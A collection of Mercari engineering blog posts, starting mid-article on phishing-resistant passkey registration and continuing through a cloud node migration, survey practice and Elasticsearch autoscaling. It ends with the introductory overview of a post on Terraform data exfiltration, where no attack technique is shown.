The strongest authentication for a user is the strongest possible means of authenticating that user (possibly combining multiple authentication methods), based on the authentication methods available to their account. For example, if a user has already registered to use a passkey, then passkey authentication would be their strongest authentication. However, if the user has not registered a passkey, then their strongest authentication would be the combination of password authentication and SMS OTP.

This becomes important when considering the authentication mechanism required when a user wants to bind a passkey to their existing Mercari account. Consider the following attack scenario:

Attacker obtains a victim’s account through a phishing site.
Attacker registers a passkey to the account using the attacker’s own device.
Attacker uses this passkey to exploit the Mercoin feature.

To mitigate this type of attack, the binding between a passkey and an existing Mercari account must be protected using the strongest possible authentication methods.

In other words, passkey management operations such as adding new passkeys or deleting existing ones must be treated as critical procedures and be protected with additional authentication.

This means that a user would be required to use SMS OTP for the first passkey registration, while passkey authentication would be required for subsequent passkey registrations.

Using this approach an attacker who obtains a victim’s information through a phishing site would still need to authenticate with the existing passkey to register a new one to obtain access to our services, which would be difficult to perform. Unfortunately if the user’s account has not yet set up a passkey, the attacker would be able to register a passkey because the required authentication method, SMS OTP, is not phishing resistant. This vulnerability is unavoidable. However, at the very least, high-value accounts can still be protected.

Proper proximity boundary

Careful consideration is needed for implementing passkey authentication as an additional authentication. Users can be required to use a different device to authenticate from the one they are using to access the service, for example when adding a new passkey for the first time on the device the user is using. The establishment of a proximity boundary plays a crucial role in creating a phishing-resistant environment.

The proximity boundary refers to the limitation on the proximity between the device requesting registration and the device receiving the authentication request. If there are no restrictions, it could potentially lead to vulnerabilities against phishing attacks. For instance, if passkey authentication is requested to issue an OTP or via push notification for registering a new passkey, the following attack scenario becomes a concern:

An attacker obtains a victim’s account through a phishing site.
The attacker initiates the passkey registration process and follows the instructions appearing on their device.
The attacker issues instructions to the victim via the phishing site to obtain information to satisfy the instructions from step 2. For instance:
a. Input an OTP into the phishing site. This OTP can be issued using passkey authentication on the victim’s device.
b. Input an OTP displayed on the phishing site into the victim’s device to authorize the enabling of an additional requested passkey.
c. Authenticate with a passkey on the victim’s device.
The attacker can then proceed with the passkey registration if the victim follows these instructions.

To mitigate this kind of attack, it is necessary to make the proximity boundary between the device requesting registration and the device receiving the authentication request.

Several potential methods exist for making the proximity boundary, such as using geo-location or IP addresses. However, these may not always be accurate. We can also use hybrid transport to make the proximity boundary, which Mercari’s passkey management relies on. Hybrid transport can serve as an alternative option when the user cannot use a passkey on a device because it requires connection to a hybrid client and hybrid authenticator via Bluetooth.

In such a situation, even if an attacker obtains a victim’s account via a phishing site and attempts to complete the passkey registration process, passkey authentication within the appropriate proximity boundaries would be required if the account uses Mercoin.

Remaining challenges

Concerns of UX on passkey bindings

Based on the above, we can identify a few requirements to make a phishing-resistant environment:

SMS OTP is required to register the first passkey.
Passkey authentication is required to register the second passkey.
This authentication should occur via hybrid transport.

These restrictions would become sticking points to some users.

First, the need for additional authentication to manage passkey registration can be perceived as cumbersome. If users register a synced passkey, they are unlikely to confront this situation frequently. However, for users with a device-bound passkey or those using multiple platform devices, they will have to register a different passkey with additional authentication. There may not become a problem as long as the authentication process is smooth, but otherwise some users may find the procedure frustrating.

The second potential problem lies in the user experience with hybrid transports. Particularly, current Android devices do not yet support hybrid clients, even though they support hybrid authenticators. This means that users cannot initiate the passkey registration from an Android device if the account has already registered a passkey with, for instance, an iOS device. There is a way to register a passkey on an Android device from an iOS device using hybrid transport, but it’s quite complicated.

Additionally, the user experience when a user cannot access a passkey on the device directly is complicated and varies between operating systems. If Relying Party (RP) uses iOS’s native API to access the passkey, a QR code can be displayed to initiate hybrid transport. This is straightforward. However, if RP uses Android’s native API or WebAuthn, users can select other methods. For example, the user could specify a separate device to use for the procedure. This increases the options available, but it also increases what the user needs to understand and select.

The third point is the recovery procedure when users lose their passkey. Given the aforementioned requirements, if users lose the capability to access all of their registered passkeys, they cannot recover by themselves. In such a scenario, users have to request customer support to reset their passkey registration to their initial state and then register a new passkey as the first passkey. When users encounter this situation, they must wait for a response from customer support, and this waiting period can lead to frustration.

—

If Android devices get support for hybrid clients, it could address the second point above. However, other points would still remain. To further improve the system, we would need to consider ways to bypass additional authentication based on some form of risk verification.

Is synced passkey acceptable for Mercari?

There is yet another potential attack scenario involving the use of passkeys.

The attacker obtains the victim’s passkey provider’s account via a phishing site.
The attacker also acquires a secret that allows them to share the passkey with their device.
They then exploit the Mercoin feature using this obtained passkey.

The synced passkey is shared between devices on the same platform. So, if a malicious attacker obtains credentials to access the passkey provider, they can use the passkey shared through the provider. This forms a new threat associated with synced passkeys.

This scenario is not critical for Mecari at the time of writing, because passkey authentication does not apply to Mercari login process. Mercoin features necessitate the use of two distinct authentication methods, each of which is managed by separate entities: password + SMS OTP managed by Mercari, and passkey managed by the passkey provider. Therefore, even if a passkey leaks from the passkey provider, it is not critical at present.

However, in the near future, we aim to adopt passkey authentication for the Mercari login process as well. In this scenario, such an attack can become critical because if an attacker gains access to the passkey provider, they can access all Mercari and Mercoin features with the passkey.

The only way to manage this situation is by defining a trust boundary and requiring additional authentication for untrusted authentication requests. The key point here is that the authentication method used for additional authentication must be managed by the RP.

Several potential options to define the trust boundary are being considered today, such as DPK, Certification, and Attestation – however, most of the options are currently unavailable. The selection must be made based on each RP’s security requirements and the approach to validating the risk of this attack. Mercari will also need to make a decision before introducing passkey authentication for the login procedure.

Conclusion

1) SMS OTP is required to register the first passkey.
2) Passkey authentication is required to register the second passkey.
3) The authentication should be via hybrid transport.

While these measures increase the feature’s security, they also result in some user friction. Efforts are ongoing to refine this process and make it more user-friendly.

x86 is dead, long live x86!

Mon, 31 Jul 2023 16:53:16 GMT

The last couple of years have been quite revolutionary in the Silicon industry as a whole. With the resurgence of horizontal integration, fabless companies like ARM, AMD, and Qualcomm have disrupted the status quo with the help of foundries like TSMC and Samsung. While the hype has been proven real in the consumer market, things work a bit differently in the enterprise world. This article outlines how Mercari replaced all of our GKE nodes from E2 (Intel x86) to T2D (AMD x86) and saw at least 30% savings, similar to those claimed by companies moving from AWS x86 nodes to ARM based Graviton nodes.

Quick primer on pricing

Since this is an article about FinOps, let me give a quick primer on how CPU and memory pricing works on Cloud. Memory is pretty straightforward, you are charged a public pricing of GB/hour for every second you keep the node provisioned . This memory comes pre-attached to the CPU on the node, meaning you don’t really get an option of what the speed of this memory is going to be (DDR3, DDR4). CPU is charged a public pricing of unit/hour. Notice I mentioned “unit” because what you get in terms of CPU will vary from one SKU to another. Best case scenario is you get allotted a full core, but more often than not you will simply get a shared core (aka hyperthreads). In the worst case you might not even get a thread, but will simply be allotted “bursts” of CPU time on a core. This distinction will become important later in the article.

Next up are discounts. One of the selling points of Cloud is “unlimited scaling” but providing truly unlimited scaling is going to end up being too expensive. So Cloud providers want to incentivize their customers to behave more predictably as if they are running on premises. GCP does this by offering Sustained Usage discount and Committed usage discounts (CUD). On the other hand they make “unlimited scaling” feasible by offering Spot VMs. You get a very high discount if you use Spot VMs that can be evicted at any moment as soon as it is requested by some other customer willing to pay for on-demand pricing. Obviously you also run the risk of never being allotted a node if they run out of spare capacity. The last discount is Enterprise discount, which you get only on committing high upfront payment for a certain timeframe.

If you want to estimate the future cost of running a Kubernetes cluster using a specific type of node, the calculation quickly gets very complicated. Typically your workloads would autoscale using HPA and then the nodes themselves would horizontally scale using Cluster Autoscaler. The CUD pricing would be charged every single minute, regardless of whether you provisioned 100 cores or 1000 cores. You need to estimate the core-hours you will consume every minute, discount it by the CUD and then sum it all up to get the actual cost. If you were to migrate from node type X to Y because Y gives you a 30% reduction in CPU usage, then your overall cluster cost would not simply decrease by 30%. but 30% + x% depending on how many daemonsets you run on your nodes. This happens because each kubernetes node needs some system components running as daemonsets which also take up valuable CPU away from your applications, so the less nodes you are running the less overall CPU consumed by these system components.

What makes T2D so great?

The biggest selling point of T2D is that it does not have any threads, as in 1 thread == 1 core just like all the ARM SoC in the market right now. From our real world testing, this has not only proven much faster in modern languages like Go but also older languages like PHP saw similar benefits. In reality though, the only reason this works out is because GCP is charging a T2D core like a single thread and not 2x of a thread. In fact, T2D is nothing but a rebranded N2D node from GCP but with SMT disabled and with much lower pricing. The outcome is that you actually get almost 2 threads worth of performance and it costs only slightly more than 1 thread compared to the default cheap option like the E2 series from Intel.

Since T2D is slightly more expensive than E2, we had to create some estimates based on our current cluster configuration as to how much CPU & Memory reduction it was going to take to get to breakeven cost from migrating all workloads to T2D and further savings. One needs to be careful here because in the case of T2D, while the on-demand prices for E2 and T2D are nearly the same, spot prices on T2D are actually cheaper than E2 but CUD pricing of E2 is quite low compared to T2D. So your breakeven calculation will depend on the ratios of the mix, the higher CUD you have, the more CPU reduction you will need to breakeven, but in case of spot it’s a no brainer to switch from E2 to T2D. To make these estimations a bit more complicated, T2D doesn’t support custom sizing. So if you were on an E2 cluster with specific CPU:Memory size, you will now also need to account how much more you will need to pay for memory and CPU because you no longer have the option to increase/decrease the size of your node to perfectly fit your workloads on them.

To measure how much CPU you will save by switching to T2D we need to start benchmarking. One thing to note is the thread vs core I spoke of earlier, which will become quite important as you start measuring performance. Mercari is mostly a Go shop, so for us the difference between core and thread doesn’t really matter (as our benchmarks below will prove) because in Go it’s really easy to maximize the CPU usage as it doesn’t rely on OS level threads for concurrency.

Model	Cores	Threads	Pricing (OnDemand in Tokyo)	Geekbench Single core	Geekbench Multi core
E2	16	32	$1004/month	1002	8685
E2	16	16	$1004/month	994	7957
T2D	32	32	$1266/month	1672	17323
N2D	32	32	$2532/month	1601	17301

We start off with a purely synthetic benchmark – Geekbench. Here E2 nodes with SMT on and off result in very similar performance (because the benchmark is really good at maximizing whatever threads/cores are presented to it with minimal stalling). Next we have T2D and N2D nodes with 32 physical cores which perform 50% better on single core and 100% better on multi-core. But this benchmark may or may not represent real workloads. To get a more Go web service focused benchmark I ran go-web-framework-benchmark on all of the nodes which run various kinds of web-frameworks, all responding in a similar fashion under high amounts of traffic. We wanted to measure CPU differences, so we ran a CPU bound test case first and we saw AMD perform almost 100% better than E2. But in reality we are never CPU bound, and we are stalling a lot of time for databases, network, disk etc.

The next test was more “real world” as it had a 10ms processing time delay to simulate a real world like scenario where CPU isn’t the bottleneck. As you can see the difference between Intel and AMD depends heavily on what framework is being used, in fact fasthttp performs better on Intel with 16 cores than AMD with 32 cores!

But in case of Mercari, we don’t always perfectly run a single application on a single server. It’s a time shared system based on a single huge GKE cluster with lots of over provisioned pods mixed together on nodes. So the only way to get a real benchmark was to actually run our services on T2D in production. We ran several canaries on different nodepools which included a variety of workloads like PHP monolith, Java based ElasticSearch cluster, Go services and even ML workloads. And they all saw nearly 40% reduction or more in CPU over E2 nodes which gave us the confidence to replace all of the nodes with T2D.

Another big advantage of staying on x86 architecture is since we aren’t switching CPU architectures here, there are not many changes needed in our existing infrastructure to migrate. In case of switching to ARM we will need to validate all different kinds of workloads, especially all 3rd party vendors or Open source projects, and need to make sure our CI can compile multi-arch images and our registry can store them correctly. All of this effort was saved when moving from x86 to x86!

One reason to focus so heavily on CPU is Amdahl’s Law. CPU is nearly 2x more expensive than memory on a standard 32 core-128GB node meaning, to save the same amount of money as saving 10% of CPU you would need to optimize nearly 30% of memory. Our real world benchmarks and estimations based on this showed that even with almost 2x more memory capacity per node, the CPU savings alone were enough to justify moving from E2 to T2D with significant overall savings.

Why did we not consider T2A (Ampere’s ARM servers)? GCP didn’t have them in stock in the Tokyo region, and the synthetic results seem to be slightly lower than T2D machine series, ondemand and spot instance prices are only slightly lower for T2A while there is no CUD for T2A which was a major deal breaker. And we were seeing overall savings in the same ballpark as other companies reported going from Intel to ARM based Graviton instances, so we don’t think we would have seen much difference had we chosen T2A

Migration process

The process of replacing nodes itself is quite minor and doesn’t require much effort.The difficulty lies in adjusting your workloads to make sure they are “rightsized” for these higher performance nodes. Mercari has around 350 microservices, so manually going around and adjusting these numbers is quite a task. Also, rightsizing, in it of itself is quite a challenging task. Simply reducing 50% CPU requests compared to E2 isn’t the right way to go about rightsizing because it’s possible that a service was unnecessarily over-provisioned/under-provisioned on E2.

The easiest path was simply relying on CPU based HPA autoscaling. A lot of our major services already had CPU autoscaling in place which automatically reduced the replica count once the service moved from E2 to T2D. We just needed to make sure the minReplica of HPA wasn’t too high for T2D or we may be stuck on minReplica for the majority of the time, thus seeing no savings.

For services not using HPA, we relied on VPA to give us new CPU request numbers based on their new usage pattern. VPA has been decent so far, we wouldn’t necessarily call it a silver bullet for Rightsizing our workloads, but that’s for another tech blog.

To finish off the migration you need to set up CUD. First off, you cannot start such migrations if you already have CUDs in place. GCP did recently introduce Flexible CUDs, but unfortunately it doesn’t cover T2D nodes. So you need to have a separate CUD for each machine type you want to use. Secondly, GCP doesn’t allow sharing CUDs between multiple projects, you can only do this if you have a single billing project and the rest of your projects are attached to this billing method. So we now create all CUDs under a single project and then share them using the Proportional attribution feature. This allows us to waste less of our CUDs in case we end up using less CPUs in the future. Another important point of consideration when deciding a CUD is since our traffic has very high peaks and lows, and we use ClusterAutoscaler along with HPA, our total core count is always in a flux. Creating a maximal CUD with minimal waste in such a case is difficult because if you overcommit you may end up spending more instead of saving. Your CUD should be equal to the global minimum count of cores used in a month. Which means your CUD will always be 100% utilized. Another drawback of making high CUD is you need to also consider future optimizations into consideration. For eg. if you were considering moving to Spot instances, they do not come under CUD, so you may end up in an overcommitted situation.

The bad & ugly

It’s not all rainbows and sunshine with T2D, it has its fair share of problems. Most critical one might be the risk of being out of stock in the GCP datacenter. Since it’s a new machine type, they do not have these nodes in high stock in all regions. So you need to make sure you don’t scale out too high without consulting with your GCP TAM. Waiting for T2D to be available in the required stock in the Tokyo region took us several months. The risk associated with T2D now is that we can’t simply scale out to any number of nodes we want. To reduce this risk we need to consider a fallback mechanism. Since most of our services are rightsized we can’t go back to E2 nodes, the CPU requests would be simply too small and they would thrash. And you cannot mix E2 and T2D nodes because HPA will end up misbehaving, half of your pods on E2 will be using too much CPU while the other half on T2D will be using too little. Since HPA considers average CPU utilization, it won’t accurately scale in or out the replicas. The only fallback nodes we can have are N2D nodes with SMT off. But the clusterAutoscaler isn’t smart enough to understand the difference between SMT on and off pricing, so it would randomly schedule T2D and N2D nodes even though these N2D nodes with SMT off would be almost twice as expensive for us.
The lack of custom sizing is also quite problematic, we end up wasting a lot of money on spare Memory on each node.

Future

We are quite excited about what the future holds for the Silicon industry. T2D is based on Zen3 which is already quite old in the consumer market. In the x86 camp, AMD has Zen4(c) based Bergamo and Genoa chips in the roadmap, Intel also seems to be catching up with Emerald Rapids. On the ARM side we already have some offerings from Ampere but it would be great to see some of those infamous Nuvia chips from Qualcomm.

On the scheduler side we would like see more optimizations in ClusterAutoscaler, especially if it could include the score of preferredDuringSchedulingIgnoredDuringExecution into account when provisioning a new node and consider true cost of node (which means including SMT config, CUD pricing and Enterprise discounts). Secondly, Kubernetes needs to have more support for heterogeneous node deployments. Not all cores are created equal, meaning if a deployment is scheduled on various machine types like E2, T2D, T3A etc it should consider each machine’s real CPU capacity rather than allocating equal timeshares like it currently does. We plan to workaround this limitation by making use of the long awaited in-place pod resize feature

Conclusion

From our experience the most important thing we have learned is to have a very scientific approach in such migrations, to not blindly trust the hype and to build your own hypothesis and test it before jumping the gun on such huge changes. As we saw, benchmarks do not show the entire picture, one should focus on what matters to your workloads the most.

Surveys, Survey Fatigue and getting Feedback

Tue, 18 Jul 2023 22:09:51 GMT

Abstract

Getting feedback can be difficult in a business environment and a survey seems like a good way to do this, but you have to be careful and be sure of your own expectations.

Be clear on what it is you want from the survey – they are not good voting systems, and if you don’t circle back to people afterwards, they will stop giving you feedback on the surveys.

Too many surveys in general can easily lead to survey fatigue and missed opportunities. There’s also a thing I call ‘survey blindness’ where people see so many surveys they don’t know which ones they’ve responded to, and miss some for that reason.

There are times where it’s quicker and just better to take the time to talk to your audience in person, individually, or in small groups.

We found that people have a better perception of surveys, when they can learn what changes were driven from them.

Introduction

“Are we gaining wisdom from our surveys?”

We started asking that question in our team several months ago. As a business we use surveys a lot. Every All Hands and other large gathering or event had its own survey.

Even in our relatively small team, we were responsible for a lot of surveys. Sometimes we called them ‘feedback forms’, but they looked and were basically surveys too.

Sometimes we would consider these returned surveys a form of popularity indicator for the event. We learned that was often a mistake too – how many people respond often has no correlation to the quality – for better or worse – of the event.

As a brief exercise I asked the team to really look at our surveys, what their history was, how they had been designed, what their goal was and what we did with the information gathered from them.

We had a lot of different findings.

Firstly, I’m not saying all surveys are bad – I’m saying that in our situation, they’d become a bit of a shiny hammer, and many things requiring interaction or ‘feedback’ had become nails.

How did I come to question this? Simply from the response I saw when the word ‘survey’ was mentioned in a conversation – a rolling of eyes and a drop in enthusiasm were common responses. That, and response rates for some larger events went into single percentage figures, with no response to open text fields in some of the larger surveys. This also proved our point that they weren’t effective voting systems.

These are fairly obvious signs of misuse or overuse.

I don’t know what came first – the nail or the hammer. Perhaps someone found Google Forms and was asked to find out what people thought of an onboarding session and so a survey was created and used on a monthly basis – who knows.

Recently of course, the COVID situation and two plus years of working from home for most people has meant that getting someone’s opinions casually in person, or taking the temperature of a room was suddenly a lot more difficult, so looking at a simple questionnaire to see if a meeting or event was working and how you could improve it, seemed like a good idea.

We’d also started using them as a KPI (Key Performance Indicator), to infer popularity or happiness with an event. This is also very close to viewing the number of survey forms submitted as a kind of voting system.

Design

I’d sat through enough of these presentations, and clicked through enough of these surveys to think to myself ‘Where does this go?’, ‘Who owns it?’, ’Why do they need this information?’ and ‘Where did my comments go?’.

This really wasn’t immediately clear to me – even for ones my team owned. I wasn’t sure how I could action the feedback, or how to communicate that to the people who submitted the surveys in the first place.

We’d ask how useful the event was, was it too long, was it too short. Were the subjects interesting for you?

Often we’d let people rate this on a scale from 1 to 5, where 1 was ‘useless’, and 5 was almost prescient. Like so many rating systems, it tended to be skewed, especially when their name was on the front of the survey, a four or five rating was pretty common.

Often when there was a text field in the design, they were empty, so we didn’t have a ‘why’ to much of the feedback we did get.

Also, all these similar forms all blended together after a while as the questions were quite generic.

The design of some forms software of course lends itself to this style since stars or ‘really useful’ to ‘very unhelpful’ are often in templates, and sometimes we think more questions will get more granular information. That’s not always true.

There are an infinite number of reasons to want a survey or feedback on a myriad of topics, so we knew there was no true right or true wrong answer for design, but we knew things could be better.

Despite how it looks, we realised that a survey is a two-way tool – if we want good information in, we needed to give information out, to make the whole process better.

To be better, on a basic level we needed to make sure the recipient understands:

Why we’re asking them to fill in the form.
Who the form is for.
What will happen with the information.
When and how they can expect feedback on actions from the survey.

We started by looking at the value of the data we wanted, and how we planned to act on it.

For example, for a training seminar, instead of asking ‘Was it too long?’, better questions might be:
‘Was enough time given to explaining the system so that you could easily understand it?’
‘Did the instructor spend too little or too much time on [microservices], [cloud integrations] [security aspects]?’

Instead of asking generic questions, we should take the time to tailor the questions to the event more, and catch outliers with text fields.

This might be obvious for regular events, but thinking about it, why not do that to get better data? There is a caveat here – if you want repeatable data from these repeating events, perhaps over the course of a year, you may have to have core questions, and session specific questions.

Talking to people

Around this time, as part of our developer experience works, we decided to sit down with every single one of our Engineering Managers (EMs) and have a 30 minute fairly unstructured conversation, which we called our ‘Outreach and Visibility’ project.

We weren’t that far through this process when we found that surveys had been on the EM’s minds too.

‘Why so many surveys?’, was a common question, but the most common theme was: What changes had been driven from these surveys?

This partly reflected our own feelings – we had many surveys, but communicating change, what about that? We actually do a lot of kaizen on our internal services – updating, revamping, and sometimes killing a service when it’s no longer needed, so where was the disconnect? Why were we keen to send surveys out, and even look at and analyse the results and even sending those results out, but we weren’t telling people what we’d changed because of those results.

In many cases it was that simple – we hadn’t told people why we’d made a change, especially when it was from a feedback form or survey from those people! We needed to change that – we needed to talk about it more when wrapping up presentations, and give examples in Slack channels; ‘Thanks for the feedback. From this we changed how we presented updates to the Engineering Ladder making it clearer’.

Also, people liked these regular Outreach and Visibility conversations, so we’re continuing to offer them to get even more feedback and hear concerns that way too, feed back what we’ve been doing from the feedback, and illustrate improvements. At the same time we’ve removed some feedback forms, encouraging direct feedback in Slack.

Conclusion

Getting information from the business is vital in a fast moving industry. Surveys are valid tools for doing this, but like any tool, we need to design and use it correctly for each task, since a ‘one-size-fits-all’ approach can fatigue end users, degrading the quality of any feedback.

Ultimately, there is always the option of talking to people. In this hybrid business world, that might be in a video conference, it might be in the office, and it might be one to one or a small group, but it should always be available.

Whichever way we choose, it’s vital that we close the circle by explaining to participants what we changed because of what they said.

Implementing Elasticsearch CPU usage based auto scaling

Thu, 13 Jul 2023 14:18:58 GMT

Hello. I’m mrkm4ntr from the Search Infra team. In our team, we operate multiple Elasticsearch clusters running on Kubernetes as part of our search infrastructure. The k8s namespaces that contain these Elasticsearch clusters are the ones that require the largest amount of resources within our multi-tenant (massive) Kubernetes cluster. We faced an issue where the resource utilization was very low because we kept the cluster size fixed based on our resource needs during peak time load. Although Elasticsearch Enterprise and Elastic Cloud have auto-scaling features, they didn’t suit our needs as they scale up/down primarily based on disk size rather than CPU load. Therefore, we decided to develop our own auto-scaling mechanism using Kubernetes HPA for scaling in/out. This resulted in greatly improved resource utilization and we achieved a cost reduction of about 40%. I will now provide more details on how we did this.

Elasticsearch and ECK

At Mercari, we use ECK (https://github.com/elastic/cloud-on-k8s) to manage Elasticsearch on Kubernetes. ECK is an Elasticsearch Custom Resource with its own controller. When you create the following resources, the corresponding StatefulSet, Service, ConfigMap and Secret resources are automatically created:

apiVersion: elasticsearch.k8s.elastic.co/v1
kind: Elasticsearch
metadata:
  name: example
spec:
  version: 8.8.1
  nodeSets:
  - name: coordinating
    count: 2
  - name: master
    count: 3
  - name: data
    count: 6

From this definition, 3 StatefulSets (coordinating, master, and data) will be created.

We wanted to scale these StatefulSets using the Horizontal Pod Autoscaler (HPA), but we ran into the following challenges:

The Elasticsearch resources themselves cannot be targeted by HPA because the scale sub-resource (described later on) is not defined. This means we cannot determine which of the multiple nodeSets should be scaled out or in.
Scaling Elasticsearch does not stop at only increasing or decreasing the number of Pods, but it also requires adjusting the replica count of indices allocated to each Pod. In other words, the scaling unit becomes ${number of shards in an index} / ${number of shards per Pod}. In the example diagram below, it would be (3 / 1) = 3. On the other hand, with HPA, it is possible to specify any value between minReplicas and maxReplicas. Elasticsearch has option auto_expand_replicas that adjusts the replica counts automatically. However, this makes the number of shards per Pod equal to the number of shards in the index (shard per Pod = shard per index), each Pod would end up with 3 shards. This does not fit our use case, and so we need to manually adjust the replica count ourselves.
In addition to the previous problem, if the StatefulSet managed by Elasticsearch resources is directly targeted by HPA and the parent Elasticsearch resource is updated, the number of Pods adjusted by HPA would be overwritten by the value provided by the parent resource.

In order to solve these problems, we created a new Kubernetes Custom Resource and controller.

Custom Resource and controller

The following is an example of what the newly introduced Custom Resource looks like:

apiVersion: search.mercari.in/v1alpha1
kind: ScalableElasticsearchNodeSet
metadata:
  name: example
spec:
  clusterName: example
  count: 6
  index:
    name: index1
    shardsPerNode: 1
  nodeSetName: data

This definition corresponds to the nodeSet definition named "data" in the Elasticsearch resource we mentioned earlier. This resource does not have a direct parent-child relationship with the Elasticsearch resource but provides scalability via a scale subresource, which can be targeted by commands like kubectl scale or HPA. The definition of the Custom Resource is generated using kubebuilder, and by adding the following comments we can enable the scale sub-resource:

//+kubebuilder:subresource:scale:specpath=.spec.count,statuspath=.status.count,selectorpath=.status.selector

This indicates .spec.count of the ScalableElasticsearchNodeSet above is the target for operations using HPA or the kubectl scale command, and the current count is recorded in .status.count. Furthermore, .status.selector records the selector used to select the managed StatefulSet for this resource. Of course, these are not recorded automatically and you need to implement your own controller to make it happen.

Additionally, the actual number of replicas in the StatefulSet is calculated from the fields count, shardsPerNode, and the shard count of the target index in the spec of this Custom Resource, as follows:

ceil(ceil(count * shardsPerNode / numberOfShards) * numberOfshards / shardsPerNode)

In other words, in the case where the shard count is 3 as mentioned earlier, the graph would look like this:

We confirmed by reading the HPA source code that HPA would keep working, even if the .spec.count of the Scale sub-resource did not match the actual count (at least for type: Resource). The current replica count used to calculate the replica count that should be set by HPA is determined by the number of Pods selected by .status.selector.

During scale-out, first, the count of the relevant nodeSet in the Elasticsearch resource is set to the value calculated from the above formula. After all pods have become ready, the replica count of the index is increased using Elasticsearch’s API. Then during scale-in, the replica count of the index is reduced first, before the count of the Elasticsearch resource is changed.

We have thus solved the first two challenges mentioned earlier. As for the third challenge, we will use MutatingWebhookConfiguration to address it. This mechanism allows us to specify hooks that are triggered when the Elasticsearch resource is updated. Within these hooks, we can define annotations like search.mercari.in/ignore-count-change: "data,coordinating". If an annotation corresponding to this pattern is found, we will override the count number of the associated nodeSet with the current count number. By implementing this solution, Elasticsearch resource updates made through GitOps or similar methods will no longer result in a reset of the count number.

Issues Found During Initial Deployment

After implementing a controller based on the above policy, we encountered several challenges, namely:

Latency increased immediately after scaling out.
Force merge prevented using CPU utilization as a metric for HPA.
Metrics used to indicate bottlenecks change when traffic is low.

We will dive into each one in more detail below.

Latency increases immediately after scaling out

We observed this issue from time to time during rolling updates. After the Data nodes started up, and shards were allocated, we could see a significant increase in latency immediately after search requests started being handled. This problem was not limited to Data nodes, but it also occurred in Coordinating nodes (nodes responsible for initial request handling, routing, and merge operations) after Istio was introduced to the microservice that sent requests to Elasticsearch.

The cause is likely related to the “JVM cold start” issue. In the case of using Istio, the Istio sidecar immediately started to evenly distribute load to the newly added Pods, which were still not quite ready. This was not an issue prior to using Istio, as HTTP keep-alive allowed for a gradual migration of traffic to the newly added Pod.

To address this challenge, we employed techniques such as passthrough (directly passing requests without relying on Istio’s service discovery) or setting a warmupDurationSecs in the DestinationRule (gradually increasing traffic to the new Pod over a specified period). However, for Data nodes, routing is solely dependent on Elasticsearch, leaving no room for external intervention. Therefore, we decided to modify Elasticsearch itself to resolve this issue. We have submitted a Pull Request to the upstream (https://github.com/elastic/elasticsearch/pull/90897).

Force merge prevented using CPU utilization as a metric for HPA

We performed force merges during low traffic hours to purge logically deleted documents, as our indices received a high number of document deletions and updates (internally, Lucene which powers Elasticsearch performs atomic deletions and additions to update a document)This was necessary as it led to severely degraded performance several days later if we forgot to perform a force merge.

However, force merging is a CPU-intensive process and is not suitable to be performed at the same time as scaling out. Therefore, we could not use CPU utilization as the metric for Horizontal Pod Autoscaler (HPA). We initially considered using the number of search requests as an external metric via Datadog. However, the query patterns and workload characteristics changed drastically depending on which microservice was calling our ES clusters, which made CPU utilization the best metric for HPA.

While reviewing the Lucene source code, we discovered an option called "deletes_pct_allowed". This option allows specifying the percentage of logically deleted documents, with a default value of 33. During performance testing with different values, we found that latency deteriorated significantly around 30%. Therefore, by setting this value to the minimum of 20 (default 20 in the latest Elasticsearch, with a minimum of 5 in https://github.com/elastic/elasticsearch/pull/93188), we were able to eliminate the need for force merges. Consequently, we were now able to use CPU utilization as the metric for HPA.

Metrics used to indicate bottlenecks change during when traffic is low traffic

In Elasticsearch, low latency is achieved by leveraging the file system cache to store the contents of the index. We aim to load all necessary information in the file system cache, and this means that a significant amount of memory is required for large indexes. During high-traffic hours, the bottleneck is typically the CPU; and thus using CPU utilization as the metric for Horizontal Pod Autoscaler (HPA) allows for effective autoscaling.

However, even during extremely low-traffic periods, it is essential to maintain a minimum number of replicas for availability. During these times, the bottleneck is memory, and allocating an excessive amount of CPU to fulfill the necessary requirements results in a lot of wasted (unused) resources.

The original configuration was set in a way that the amount of memory allocated was twice the size of the index on disk, and the memory.usage metric indicated high values. However, upon examining memory.working_set, it was apparent that there was still plenty of headroom. In Kubernetes, memory.working_set is calculated by subtracting inactive files from memory.usage. Inactive files roughly refer to the size of infrequently accessed file system cache. In Kubernetes, these file system caches are evicted before reaching the memory limit of the container. Consequently, it became clear that we could get away with allocating less memory.

While it is true that active file system caches can also be evicted, evicting them excessively would lead to performance degradation. The challenge lies in the fact that the conditions for files to transition from inactive to active are relatively loose, making it difficult to determine the extent to which eviction is possible explicitly. As a result, we could not aggressively lower the value for memory request. However, this approach allowed us to reduce the total CPU requests during timeframes where memory was the bottleneck.

It is difficult to apply a VPA that requires a Pod restart to Elasticsearch, as it is a stateful application. However, with the availability of In-place Update of Pod Resources (https://kubernetes.io/blog/2023/05/12/in-place-pod-resize-alpha/), it will be possible to scale down CPU requests without restarting, so we can expect this issue to be alleviated.

Final thoughts (We are hiring!)

In this article, we discussed how to use Horizontal Pod Autoscaler (HPA) to autoscale an Elasticsearch cluster running on Kubernetes with ECK based on CPU utilization. This resulted in approximately 40% reduction in Kubernetes costs related to Elasticsearch operations. We anticipate that in the future, Elastic Cloud will likely provide similar autoscaling features as part of its Serverless offerings. However, in our current situation, we find this method to be effective.

The search infra team is currently looking for colleagues to join us. If you are interested, please feel free to contact us at Software Engineer, Search Platform Development – Mercari.

Bucket full of secrets – Terraform exfiltration

Thu, 06 Jul 2023 11:21:39 GMT

Background

At Mercari, we utilize many microservices developed across multiple different teams. Each team has ownership over not only their code, but also the infrastructure necessary to run their services. To allow developers to take ownership of their infrastructure we use HashiCorp Terraform to define the infrastructure as code. Developers can use Terraform native resources or custom modules provided by our Platform Infra Team to configure the infrastructure required by their service. Provisioning of this infrastructure is carried out as part of our CI/CD pipeline. You can read more about securing our Terraform monorepo CI here.

In a previous article, we discussed Poisoned Pipeline Execution and how to achieve arbitrary code execution with it. In this article we will focus on how Terraform can be abused to exfiltrate data from your environment.

Intro

In the below section, we will take a look at how Terraform CI/CD works. If you have read our previous article or know your way around Terraform already, feel free to skip it.

Terraform CI/CD Overview

Infrastructure provisioning using Terraform happens in two stages: plan and apply. During the plan stage Terraform parses the current state of your infrastructure and the provided Terraform configuration to build a dependency graph of resources, usually referred to as the Terraform Plan. During the apply stage this graph is used to apply all the necessary actions to transform your current infrastructure state to the configuration defined by your code. Note that the plan stage is generally considered as read only i.e., all operations executed by Terraform during the plan stage should only read data and not make any lasting changes to infrastructure or systems. Such modifications should only happen during the apply stage, when the configuration is deployed and applied to the infrastructure.

